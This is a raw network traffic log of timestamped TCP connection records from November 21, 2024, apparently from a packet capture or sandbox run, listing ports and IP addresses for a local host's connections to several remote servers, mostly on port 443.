                                                                                                                                                                        Nov 21, 2024 10:37:55.204451084 CET4434981040.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:55.204762936 CET49810443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:55.251333952 CET4434981040.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:55.550981045 CET4434980940.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:55.551181078 CET4434980940.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:55.551579952 CET49809443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:55.551579952 CET49809443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:55.555407047 CET4434980813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:55.555435896 CET4434980813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:55.555897951 CET49808443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:55.555916071 CET4434980813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:55.556034088 CET49808443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:55.556034088 CET49808443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:55.556047916 CET4434980813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:55.556205988 CET4434980813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:55.556241035 CET4434980813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:55.556385040 CET49808443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:55.558718920 CET49815443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:55.558769941 CET4434981513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:55.558931112 CET49815443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:55.559063911 CET49815443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:55.559079885 CET4434981513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:55.604161978 CET4434981040.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:55.604315996 CET4434981040.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:55.604449987 CET49810443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:55.604513884 CET49810443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:55.604527950 CET4434981040.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:55.863214970 CET49809443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:55.863238096 CET4434980940.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:56.001835108 CET4434981213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:56.048139095 CET49812443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:56.123214006 CET4434981113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:56.135204077 CET49812443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:56.135222912 CET4434981213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:56.135838032 CET49812443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:56.135847092 CET4434981213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:56.170439005 CET49811443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:56.170461893 CET4434981113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:56.171005011 CET49811443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:56.171021938 CET4434981113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:56.386570930 CET4434981413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:56.394862890 CET4434981313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:56.421142101 CET49814443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:56.421173096 CET4434981413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:56.427558899 CET49814443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:56.427567005 CET4434981413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:56.437057018 CET49813443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:56.437057018 CET49813443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:56.437094927 CET4434981313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:56.437108040 CET4434981313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:56.456758022 CET4434981213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:56.456774950 CET4434981213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:56.456816912 CET4434981213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:56.456845999 CET49812443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:56.457778931 CET49812443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:56.473690987 CET49812443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:56.473714113 CET4434981213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:56.473742962 CET49812443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:56.473752022 CET4434981213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:56.508562088 CET49816443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:56.508599997 CET4434981613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:56.509401083 CET49816443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:56.510951996 CET49816443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:56.510967016 CET4434981613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:56.576581001 CET4434981113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:56.576598883 CET4434981113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:56.576673031 CET49811443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:56.576689959 CET4434981113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:56.576761961 CET49811443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:56.576967955 CET49811443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:56.576972961 CET4434981113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:56.576989889 CET49811443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:56.577137947 CET4434981113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:56.577164888 CET4434981113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:56.577222109 CET49811443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:56.587816954 CET49817443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:56.587855101 CET4434981713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:56.587912083 CET49817443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:56.588196039 CET49817443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:56.588211060 CET4434981713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:56.839915991 CET4434981413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:56.841644049 CET4434981313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:56.843261003 CET4434981413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:56.843327999 CET49814443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:56.844531059 CET4434981313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:56.844636917 CET49813443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:57.036283016 CET49814443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:57.036309004 CET4434981413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:57.036319971 CET49814443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:57.036330938 CET4434981413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:57.038603067 CET49813443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:57.038603067 CET49813443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:57.038636923 CET4434981313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:57.038649082 CET4434981313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:57.052155018 CET49824443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:57.052189112 CET4434982413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:57.052242041 CET49824443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:57.053983927 CET49825443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:57.054014921 CET4434982513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:57.054111004 CET49825443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:57.054574013 CET49824443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:57.054590940 CET4434982413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:57.055797100 CET49825443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:57.055816889 CET4434982513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:57.283149004 CET4434981513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:57.283629894 CET49815443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:57.283663034 CET4434981513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:57.284395933 CET49815443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:57.284403086 CET4434981513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:57.720159054 CET4434981513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:57.723130941 CET4434981513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:57.723237991 CET49815443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:57.723294020 CET49815443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:57.723305941 CET4434981513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:57.723325014 CET49815443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:57.723334074 CET4434981513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:57.726006985 CET49828443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:57.726052999 CET4434982813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:57.726233959 CET49828443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:57.726428986 CET49828443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:57.726442099 CET4434982813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:58.227581978 CET4434981613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:58.228060961 CET49816443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:58.228072882 CET4434981613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:58.228512049 CET49816443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:58.228517056 CET4434981613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:58.304131031 CET4434981713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:58.305321932 CET49817443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:58.305351019 CET4434981713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:58.305851936 CET49817443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:58.305859089 CET4434981713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:58.661000967 CET4434981613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:58.661099911 CET4434981613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:58.661179066 CET49816443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:58.661345959 CET49816443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:58.661360025 CET4434981613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:58.661369085 CET49816443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:58.661374092 CET4434981613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:58.664284945 CET49830443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:58.664309978 CET4434983013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:58.664387941 CET49830443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:58.664531946 CET49830443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:58.664541006 CET4434983013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:58.745368958 CET4434981713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:58.748420000 CET4434981713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:58.748477936 CET49817443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:58.748522043 CET49817443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:58.748537064 CET4434981713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:58.748562098 CET49817443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:58.748568058 CET4434981713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:58.750957012 CET49831443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:58.750993013 CET4434983113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:58.751234055 CET49831443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:58.751349926 CET49831443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:58.751359940 CET4434983113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:58.779860020 CET4434982413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:58.780364990 CET49824443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:58.780386925 CET4434982413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:58.781029940 CET49824443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:58.781033993 CET4434982413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:58.903753042 CET4434982513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:58.904253006 CET49825443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:58.904275894 CET4434982513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:58.905039072 CET49825443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:58.905044079 CET4434982513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:59.216495037 CET4434982413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:59.219646931 CET4434982413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:59.219840050 CET49824443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:59.226167917 CET49824443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:59.226186037 CET4434982413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:59.241662979 CET49833443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:59.241724014 CET4434983313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:59.241790056 CET49833443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:59.244230032 CET49833443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:59.244251966 CET4434983313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:59.355721951 CET4434982513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:59.358623028 CET4434982513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:59.358710051 CET49825443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:59.498605967 CET49825443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:59.498605967 CET49825443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:59.498629093 CET4434982513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:59.498656034 CET4434982513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:59.577049971 CET4434982813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:59.624253035 CET49828443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:59.804836035 CET49828443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:59.804858923 CET4434982813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:59.805404902 CET49828443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:59.805409908 CET4434982813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:59.892323971 CET49834443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:59.892359018 CET4434983413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:59.892445087 CET49834443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:59.936809063 CET49834443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:59.936827898 CET4434983413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:59.966833115 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:38:00.138423920 CET4434982813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:00.141573906 CET4434982813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:00.143460989 CET49828443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:00.143541098 CET49828443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:00.143562078 CET4434982813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:00.143573046 CET49828443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:00.143579006 CET4434982813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:00.146167994 CET49836443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:00.146234035 CET4434983613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:00.146312952 CET49836443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:00.146647930 CET49836443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:00.146682024 CET4434983613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:00.384186983 CET4434983013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:00.384790897 CET49830443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:00.384824991 CET4434983013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:00.385260105 CET49830443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:00.385267019 CET4434983013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:00.530008078 CET4434983113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:00.530509949 CET49831443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:00.530539989 CET4434983113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:00.531049967 CET49831443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:00.531056881 CET4434983113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:00.818886042 CET4434983013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:00.821964025 CET4434983013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:00.822025061 CET49830443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:00.822068930 CET49830443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:00.822068930 CET49830443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:00.822088957 CET4434983013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:00.822103977 CET4434983013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:00.825043917 CET49837443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:00.825095892 CET4434983713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:00.825169086 CET49837443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:00.825517893 CET49837443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:00.825541019 CET4434983713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:00.974138975 CET4434983113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:00.977380991 CET4434983113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:00.977444887 CET49831443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:00.977632999 CET49831443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:00.977653027 CET4434983113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:00.977664948 CET49831443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:00.977670908 CET4434983113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:00.982521057 CET49840443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:00.982618093 CET4434984013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:00.983030081 CET49840443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:00.983185053 CET49840443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:00.983206987 CET4434984013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:01.027152061 CET4434983313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:01.027632952 CET49833443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:01.027666092 CET4434983313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:01.028079987 CET49833443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:01.028084993 CET4434983313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:01.071489096 CET49841443192.168.2.6172.217.16.196
                                                                                                                                                                        Nov 21, 2024 10:38:01.071541071 CET44349841172.217.16.196192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:01.071664095 CET49841443192.168.2.6172.217.16.196
                                                                                                                                                                        Nov 21, 2024 10:38:01.071903944 CET49841443192.168.2.6172.217.16.196
                                                                                                                                                                        Nov 21, 2024 10:38:01.071924925 CET44349841172.217.16.196192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:01.482181072 CET4434983313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:01.484476089 CET4434983313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:01.484549046 CET49833443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:01.484601974 CET49833443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:01.484622002 CET4434983313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:01.484636068 CET49833443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:01.484642982 CET4434983313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:01.490858078 CET49842443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:01.490894079 CET4434984213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:01.491065025 CET49842443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:01.491209984 CET49842443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:01.491224051 CET4434984213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:01.522231102 CET4434983413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:01.522682905 CET49834443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:01.522711992 CET4434983413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:01.523124933 CET49834443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:01.523130894 CET4434983413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:01.606518030 CET49843443192.168.2.6184.28.90.27
                                                                                                                                                                        Nov 21, 2024 10:38:01.606606007 CET44349843184.28.90.27192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:01.606694937 CET49843443192.168.2.6184.28.90.27
                                                                                                                                                                        Nov 21, 2024 10:38:01.607866049 CET49843443192.168.2.6184.28.90.27
                                                                                                                                                                        Nov 21, 2024 10:38:01.607901096 CET44349843184.28.90.27192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:01.968312025 CET4434983413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:01.972003937 CET4434983413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:01.972127914 CET4434983413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:01.972199917 CET49834443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:01.978948116 CET49834443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:01.978964090 CET4434983413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:01.983691931 CET49844443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:01.983747005 CET4434984413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:01.983804941 CET49844443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:01.985002041 CET49844443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:01.985032082 CET4434984413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:01.997397900 CET4434983613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:01.999481916 CET49836443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:01.999516964 CET4434983613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:01.999936104 CET49836443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:01.999948025 CET4434983613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:02.448426962 CET4434983613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:02.451853991 CET4434983613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:02.451921940 CET49836443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:02.451955080 CET49836443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:02.451976061 CET4434983613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:02.451992035 CET49836443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:02.451998949 CET4434983613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:02.454576015 CET49845443192.168.2.613.107.246.60
